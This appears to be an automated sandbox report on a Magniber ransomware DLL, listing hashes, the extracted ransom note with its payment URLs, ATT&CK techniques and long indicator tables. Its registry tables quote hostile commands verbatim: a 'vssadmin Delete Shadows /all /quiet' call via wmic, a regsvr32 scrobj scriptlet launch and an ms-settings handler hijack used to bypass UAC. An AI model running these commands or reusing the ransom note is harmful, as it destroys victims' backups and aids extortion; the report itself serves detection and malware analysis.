magniber | 02ba3fa9b8eab79fce998cc95068d0850d9f7a649e68885f5b898dfd9a15f86a

Analysis

max time kernel
145s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20-08-2024 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

02ba3fa9b8eab79fce998cc95068d0850d9f7a649e68885f5b898dfd9a15f86a.dll
Size

39KB
MD5

378724bc77e6e2dc4aedeed2284aee78
SHA1

34eca8f2dfb3b1310edb58520ac7dcb701ae1238
SHA256

02ba3fa9b8eab79fce998cc95068d0850d9f7a649e68885f5b898dfd9a15f86a
SHA512

e7ffdd0908f21a44bdab537271e5b52bfe5d6c1d6aae1285e45cf1d14b324f31c8ba7928c9a8861fcc23717fd5e6e572e6ee161e905ac6d97f173a614d1dbadb
SSDEEP

768:ETG3GMYYztufCPgSGHk/YUze//YwufcxuZ3A47+R:OQVuHvUzenYwKcx6A47+

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://3cfcfa5820acfc40c4yxxumuibd.amjblanypjy2tews4maivajjj7zhb4yxafhbqv7yqzej3bjq4n3h2nyd.onion/yxxumuibd Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://3cfcfa5820acfc40c4yxxumuibd.veryits.quest/yxxumuibd http://3cfcfa5820acfc40c4yxxumuibd.rawloop.fit/yxxumuibd http://3cfcfa5820acfc40c4yxxumuibd.billfun.uno/yxxumuibd http://3cfcfa5820acfc40c4yxxumuibd.knewpen.space/yxxumuibd Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://3cfcfa5820acfc40c4yxxumuibd.amjblanypjy2tews4maivajjj7zhb4yxafhbqv7yqzej3bjq4n3h2nyd.onion/yxxumuibd

http://3cfcfa5820acfc40c4yxxumuibd.veryits.quest/yxxumuibd

http://3cfcfa5820acfc40c4yxxumuibd.rawloop.fit/yxxumuibd

http://3cfcfa5820acfc40c4yxxumuibd.billfun.uno/yxxumuibd

http://3cfcfa5820acfc40c4yxxumuibd.knewpen.space/yxxumuibd

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/4396-0-0x00000260BEAB0000-0x00000260BEAB5000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 50 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3976	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4572	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	464	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3748	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1216	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5988	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	276	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	268	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2044	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5136	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	116	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2480	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3144	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5704	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5128	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6116	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4476	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5300	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4932	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3132	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2444	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5888	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4936	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	640	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	676	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3388	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3260	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2532	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5160	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	32	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4796	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2004	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5624	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6000	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3104	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5652	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4396	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	392	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2792	4072	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5916	4072	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3104	4072	vssadmin.exe	89

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (72) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 13 IoCs

description	pid	Process	procid_target
PID 4396 set thread context of 2700	4396	rundll32.exe	44
PID 4396 set thread context of 2720	4396	rundll32.exe	45
PID 4396 set thread context of 2868	4396	rundll32.exe	49
PID 4396 set thread context of 3508	4396	rundll32.exe	55
PID 4396 set thread context of 3684	4396	rundll32.exe	57
PID 4396 set thread context of 3864	4396	rundll32.exe	58
PID 4396 set thread context of 3960	4396	rundll32.exe	59
PID 4396 set thread context of 4024	4396	rundll32.exe	60
PID 4396 set thread context of 1036	4396	rundll32.exe	61
PID 4396 set thread context of 3544	4396	rundll32.exe	62
PID 4396 set thread context of 440	4396	rundll32.exe	64
PID 4396 set thread context of 4848	4396	rundll32.exe	75
PID 4396 set thread context of 1172	4396	rundll32.exe	80

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 30 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
5128	vssadmin.exe
3132	vssadmin.exe
32	vssadmin.exe
5704	vssadmin.exe
4476	vssadmin.exe
3016	vssadmin.exe
5888	vssadmin.exe
5652	vssadmin.exe
3976	vssadmin.exe
268	vssadmin.exe
3388	vssadmin.exe
5160	vssadmin.exe
2204	vssadmin.exe
276	vssadmin.exe
2004	vssadmin.exe
1284	vssadmin.exe
4396	vssadmin.exe
4496	vssadmin.exe
5988	vssadmin.exe
3144	vssadmin.exe
3104	vssadmin.exe
4572	vssadmin.exe
5300	vssadmin.exe
2444	vssadmin.exe
5916	vssadmin.exe
5136	vssadmin.exe
2532	vssadmin.exe
2044	vssadmin.exe
5624	vssadmin.exe
3260	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies registry class 51 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	DllHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\MuiCache	backgroundTaskHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5044	notepad.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4396	rundll32.exe
4396	rundll32.exe
5356	msedge.exe
5356	msedge.exe
4884	msedge.exe
4884	msedge.exe
5928	identity_helper.exe
5928	identity_helper.exe
1604	msedge.exe
1604	msedge.exe
1604	msedge.exe
1604	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3508	Explorer.EXE
2868	taskhostw.exe

Suspicious behavior: MapViewOfSection 13 IoCs

pid	Process
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe
4396	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4024	RuntimeBroker.exe
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	4024	RuntimeBroker.exe
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	4932	wmic.exe
Token: SeSecurityPrivilege	4932	wmic.exe
Token: SeTakeOwnershipPrivilege	4932	wmic.exe
Token: SeLoadDriverPrivilege	4932	wmic.exe
Token: SeSystemProfilePrivilege	4932	wmic.exe
Token: SeSystemtimePrivilege	4932	wmic.exe
Token: SeProfSingleProcessPrivilege	4932	wmic.exe
Token: SeIncBasePriorityPrivilege	4932	wmic.exe
Token: SeCreatePagefilePrivilege	4932	wmic.exe
Token: SeBackupPrivilege	4932	wmic.exe
Token: SeRestorePrivilege	4932	wmic.exe
Token: SeShutdownPrivilege	4932	wmic.exe
Token: SeDebugPrivilege	4932	wmic.exe
Token: SeSystemEnvironmentPrivilege	4932	wmic.exe
Token: SeRemoteShutdownPrivilege	4932	wmic.exe
Token: SeUndockPrivilege	4932	wmic.exe
Token: SeManageVolumePrivilege	4932	wmic.exe
Token: 33	4932	wmic.exe
Token: 34	4932	wmic.exe
Token: 35	4932	wmic.exe
Token: 36	4932	wmic.exe
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeShutdownPrivilege	3508	Explorer.EXE
Token: SeCreatePagefilePrivilege	3508	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2512	wmic.exe
Token: SeSecurityPrivilege	2512	wmic.exe
Token: SeTakeOwnershipPrivilege	2512	wmic.exe
Token: SeLoadDriverPrivilege	2512	wmic.exe
Token: SeSystemProfilePrivilege	2512	wmic.exe
Token: SeSystemtimePrivilege	2512	wmic.exe
Token: SeProfSingleProcessPrivilege	2512	wmic.exe
Token: SeIncBasePriorityPrivilege	2512	wmic.exe
Token: SeCreatePagefilePrivilege	2512	wmic.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
3508	Explorer.EXE
3508	Explorer.EXE
3508	Explorer.EXE
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
3508	Explorer.EXE
3508	Explorer.EXE
3508	Explorer.EXE
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe

Suspicious use of UnmapMainImage 4 IoCs

pid	Process
440	RuntimeBroker.exe
3508	Explorer.EXE
4024	RuntimeBroker.exe
3544	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3684 wrote to memory of 5044	3684	svchost.exe	95
PID 3684 wrote to memory of 5044	3684	svchost.exe	95
PID 3684 wrote to memory of 4760	3684	svchost.exe	96
PID 3684 wrote to memory of 4760	3684	svchost.exe	96
PID 3684 wrote to memory of 4932	3684	svchost.exe	97
PID 3684 wrote to memory of 4932	3684	svchost.exe	97
PID 3684 wrote to memory of 4912	3684	svchost.exe	98
PID 3684 wrote to memory of 4912	3684	svchost.exe	98
PID 3684 wrote to memory of 3192	3684	svchost.exe	156
PID 3684 wrote to memory of 3192	3684	svchost.exe	156
PID 4024 wrote to memory of 2512	4024	RuntimeBroker.exe	104
PID 4024 wrote to memory of 2512	4024	RuntimeBroker.exe	104
PID 4024 wrote to memory of 2500	4024	RuntimeBroker.exe	105
PID 4024 wrote to memory of 2500	4024	RuntimeBroker.exe	105
PID 4024 wrote to memory of 4268	4024	RuntimeBroker.exe	106
PID 4024 wrote to memory of 4268	4024	RuntimeBroker.exe	106
PID 3192 wrote to memory of 2788	3192	cmd.exe	111
PID 3192 wrote to memory of 2788	3192	cmd.exe	111
PID 4268 wrote to memory of 3132	4268	cmd.exe	112
PID 4268 wrote to memory of 3132	4268	cmd.exe	112
PID 4912 wrote to memory of 3660	4912	cmd.exe	113
PID 4912 wrote to memory of 3660	4912	cmd.exe	113
PID 2500 wrote to memory of 1864	2500	cmd.exe	114
PID 2500 wrote to memory of 1864	2500	cmd.exe	114
PID 4760 wrote to memory of 4884	4760	cmd.exe	128
PID 4760 wrote to memory of 4884	4760	cmd.exe	128
PID 4884 wrote to memory of 4640	4884	msedge.exe	130
PID 4884 wrote to memory of 4640	4884	msedge.exe	130
PID 1216 wrote to memory of 4400	1216	cmd.exe	132
PID 1216 wrote to memory of 4400	1216	cmd.exe	132
PID 4452 wrote to memory of 316	4452	cmd.exe	133
PID 4452 wrote to memory of 316	4452	cmd.exe	133
PID 464 wrote to memory of 4428	464	cmd.exe	207
PID 464 wrote to memory of 4428	464	cmd.exe	207
PID 3748 wrote to memory of 4012	3748	cmd.exe	135
PID 3748 wrote to memory of 4012	3748	cmd.exe	135
PID 4400 wrote to memory of 5196	4400	ComputerDefaults.exe	136
PID 4400 wrote to memory of 5196	4400	ComputerDefaults.exe	136
PID 316 wrote to memory of 5336	316	ComputerDefaults.exe	191
PID 316 wrote to memory of 5336	316	ComputerDefaults.exe	191
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
